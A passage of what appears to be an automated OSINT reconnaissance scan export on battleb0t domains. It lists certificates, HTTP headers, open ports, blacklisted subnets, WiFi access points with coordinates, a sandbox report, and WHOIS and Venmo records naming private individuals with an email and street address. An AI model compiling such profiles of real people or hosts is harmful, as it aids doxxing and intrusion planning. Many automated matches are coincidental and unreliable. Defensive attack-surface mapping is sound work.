"OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", 
"exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 02:44:21 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | United States | 185.199.111.153 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | DevOps - DevOps is a methodology in the software development and IT industry. Used as a set of practices and tools, DevOps integrates and automates the work of software development and IT operations as a means for improving and shortening the systems development life cycle. | battleb0t.github.io |
| 2023-05-12 02:54:51 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Content_Length": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Content_Length": ["0"], "X_Nf_Request_Id": ["01H06V19Y9J57EVG1E6053DPH4"], "Server": ["Netlify"]} | 34.74.170.74 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | zoom1330 (Net ID: 00:01:38:92:E5:07) | 37.780462,-122.390564 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c56db576d8c1409-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.6.166 |
| 2023-05-12 03:01:24 | Web Server | No | Tool - WhatWeb | 0 | 0 | 1 | 0 | None | cloudflare | ayhu.xyz |
| 2023-05-12 03:01:13 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.128): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:11 | Raw Data from RIRs | No | Venmo | 0 | 0 | 6 | 0 | None | {u'username': u'login', u'first_name': u'baptiste', u'last_name': u'vauthey', u'display_name': u'baptiste vauthey', u'identity_type': u'personal', u'profile_picture_url': u'https://s3.amazonaws.com/venmo/no-image.gif', u'id': u'1987457377632256359', u'date_joined': u'2016'} | login |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | figma (Category: tech)
https://www.figma.com/@login | login |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.92): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys-a (Net ID: 00:0C:41:0B:AB:D7) | 39.0469, -77.4903 |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.201): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:24:33 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 4 | 0 | None | VXVault Malicious URL List [cdn-185-199-109-154.github.com]
http://vxvault.net/URL_List.php | cdn-185-199-109-154.github.com |
| 2023-05-12 03:32:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.10:8080 | 188.114.97.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | speedstream (Net ID: 00:01:24:F1:A9:A3) | 34.0544, -118.244 |
| 2023-05-12 02:44:16 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.111.153 |
| 2023-05-12 02:56:52 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | oldfluid.battleb0t.xyz | [{"url": "https://oldfluid.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://oldfluid.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:24:22 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html | https://kekw.battleb0t.xyz/jar |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ASI (Net ID: 00:02:6F:51:19:D9) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:53:57 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://wasimreja.me/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e74_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_e74_IESQMMUTEX_0_519"\n "IsoScope_e74_ConnHashTable<3700>_HashTable_Mutex"\n "IsoScope_e74_IESQMMUTEX_0_331"\n "IsoScope_e74_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3700"\n "IsoScope_e74_IE_EarlyTabStart_0xd58_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3700"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "142.250.189.202:443"\n 
"104.18.28.243:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"fonts.googleapis.com"\n "unicons.iconscout.com"\n "wasimreja.me"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<a href="https://www.linkedin.com/in/wasimreja/" target="_blank"" (Indicator: "linkedin.com")\n "<a href="https://twitter.com/_wasimreja" target="_blank" class="home-social-icon">" (Indicator: "twitter")\n "<i class="uil uil-twitter-alt"></i>" (Indicator: "twitter")\n "<i class="uil uil-twitter-alt contact-icon"></i>" (Indicator: "twitter")\n "Twitter" (Indicator: "twitter")\n "<a href="https://twitter.com/_wasimreja" class="footer-social" target="_blank">" (Indicator: "twitter")\n "<a href="https://www.linkedin.com/in/wasimreja/" class="footer-social"" (Indicator: "linkedin.com")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar41C.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar38D.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive 
files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002812]\n "Cab38C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab38C.tmp]- [targetUID: 00000000-00002812]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"favicon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "silence_1_.gif" has type "GIF image data version 89a 500 x 682"- [targetUID: N/A]\n "whats%20cooking_1_.png" has type "PNG image data 1280 x 587 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "music%20player_1_.png" has type "PNG image data 1280 x 587 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "task%20buddy_1_.png" has type "PNG image data 1263 x 700 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Tar41C.tmp" has type "data"- Location: [%TEMP%\\Tar41C.tmp]- [targetUID: 00000000-00002812]\n "swiper-bundle.min_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "gcr%20leaderboard_1_.png" has type "PNG image data 1919 x 838 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n 
"typing%20speed%20test_1_.png" has type "PNG image data 1920 x 874 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "notes%20mini_1_.png" has type "PNG image data 1920 x 838 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002812]\n "sandesh_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data big-endian direntries=7 orientation=upper-left xresolution=98 yresolution=106 resolutionunit=3 software=Adobe Photoshop CC 2017 (Windows) datetime=2020:06:20 11:34:14] progressive precision 8 1920x850 components 3"- [targetUID: N/A]\n "line_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "quizzler_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1652x805 components 3"- [targetUID: N/A]\n "book%20finder_1_.png" has type "PNG image data 1263 x 684 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "dictionary%20app_1_.png" has type "PNG image data 1280 x 587 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "avatar_1_.png" has type "PNG image data 500 x 500 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "urlref_httpswasimreja.me" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "unicons-10_1_.eot" has type "Embedded OpenType (EOT) unicons-10 family"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, 
u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://wasimreja.me/"\n Pattern match: "https://wasimreja.me"\n Pattern match: "https://swiperjs.com"\n Pattern match: "C.JgU/0$"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z+N0L0J+0"\n Pattern match: "www.microsoft.com0"\n Pattern match: "https://wasimreja.me/assets/img/opengraph.png"\n Pattern match: "https://fonts.googleapis.com"\n Pattern match: "https://fonts.gstatic.com"\n Pattern match: "https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600&display=swap"\n Pattern match: "https://unicons.iconscout.com/release/v4.0.0/css/line.css"\n Pattern match: "https://www.linkedin.com/in/wasimreja/"\n Pattern match: "https://github.com/wasimreja"\n Pattern match: "https://twitter.com/_wasimreja"\n Pattern match: "https://www.instagram.com/_wasimreja"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "http://www.w3.org/1999/xlink"\n Pattern match: "https://notes-mini.vercel.app/"\n Pattern match: "https://typing-speed-test.onrender.com/"\n Pattern match: "https://gcr-leaderboard.vercel.app/"\n Pattern match: "https://book-finder.onrender.com/"\n Pattern match: "http://whats-cooking.vercel.app/"\n Pattern match: "https://task-buddy.netlify.app/"\n Pattern match: "https://dictionary-app.onrender.com/"\n Pattern match: "https://quizzler.vercel.app/"\n Pattern match: "https://wasimreja.github.io/music-player/"\n Pattern match: "https://github.com/wasimreja/sandesh"\n Heuristic match: "wr2435@it.jgec.ac.in"\n Pattern match: "https://instagram.com/_wasimreja"\n Heuristic match: "fonts.googleapis.com"\n Heuristic match: "unicons.iconscout.com"\n Heuristic match: "wasimreja.me"\n Pattern match: "https://wasimreja.me/Accept-Language"\n Pattern match: "ns.adobe.com/xap/1.0/"\n Pattern match: 
"http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n Pattern match: "http://fontello.comIconscoutunicons-13Regularunicons-13unicons-13Version"\n Pattern match: "http://fontello.comIconscoutunicons-12Regularunicons-12unicons-12Version"\n Pattern match: "http://fontello.comIconscoutunicons-0Regularunicons-0unicons-0Version"\n Pattern match: "http | 185.199.109.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | myLGNet (Net ID: 00:02:A8:C2:91:21) | 50.1188, 8.6843 |
| 2023-05-12 03:09:45 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 132.97.148.34.bc.googleusercontent.com | 34.148.97.132 |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.200): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.249): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:57 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c443d4879e76326-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 2a06:98c1:3120::1 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SX551D17A4D (Net ID: 00:01:E3:D1:7A:4D) | 50.8897, 6.0563 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00root.github.io | 185.199.111.153 |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 104.21.71.14 |
| 2023-05-12 03:23:13 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.2:8443 | 188.114.96.0/24 |
| 2023-05-12 02:44:40 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 116.48.229.35.bc.googleusercontent.com | 35.229.48.116 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | My Passport (2.4 GHz) - 0778A5 (Net ID: 00:00:C0:07:78:A5) | 37.7813933,-122.3918002 |
| 2023-05-12 02:50:56 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:62:27:a6:dc:16:28:de:ae:a0:a4:7d:7e:a0:02:81:25:0e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 21:24:59 2022 GMT
Not After : Mar 18 21:24:58 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:29:A0:EB:78:CC:40:89:5B:55:A3:66:D6:68:C3:AE:DF:AB:BB:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 18 22:24:59.092 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 18 22:24:59.634 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/nomnom.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:54:03 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c57f0d8baaf3a64-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.135.9 |
| 2023-05-12 03:09:26 | Co-Hosted Site - Domain Whois | No | Whois | 3 | 0 | 4 | 0 | None | Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com/
Updated Date: 2023-01-20T18:05:08.0Z
Creation Date: 2022-12-18T04:19:38.0Z
Registry Expiry Date: 2031-12-18T23:59:59.0Z
Registrar: Name.com, Inc
Registrar IANA ID: 625
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization:
Registrant State/Province: YN
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1CNB.NAME.COM
Name Server: NS2KNZ.NAME.COM
Name Server: NS3CNA.NAME.COM
Name Server: NS4BLX.NAME.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: jrupp@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:26.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com
Updated Date: 2023-01-20T18:05:08Z
Creation Date: 2022-12-18T04:19:38Z
Registrar Registration Expiration Date: 2031-12-18T23:59:59Z
Registrar: Name.com, Inc.
Registrar IANA ID: 625
Reseller:
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Aaron Young
Registrant Organization:
Registrant Street: 408 Longquan Rd.
Registrant City: KM
Registrant State/Province: YN
Registrant Postal Code: 650000
Registrant Country: CN
Registrant Phone: Non-Public Data
Registrant Email: https://www.name.com/contact-domain-whois/007316.xyz/registrant
Registry Admin ID: Not Available From Registry
Admin Name: Aaron Young
Admin Organization:
Admin Street: 408 Longquan Rd.
Admin City: KM
Admin State/Province: YN
Admin Postal Code: 650000
Admin Country: CN
Admin Phone: Non-Public Data
Admin Email: https://www.name.com/contact-domain-whois/007316.xyz/admin
Registry Tech ID: Not Available From Registry
Tech Name: Aaron Young
Tech Organization:
Tech Street: 408 Longquan Rd.
Tech City: KM
Tech State/Province: YN
Tech Postal Code: 650000
Tech Country: CN
Tech Phone: Non-Public Data
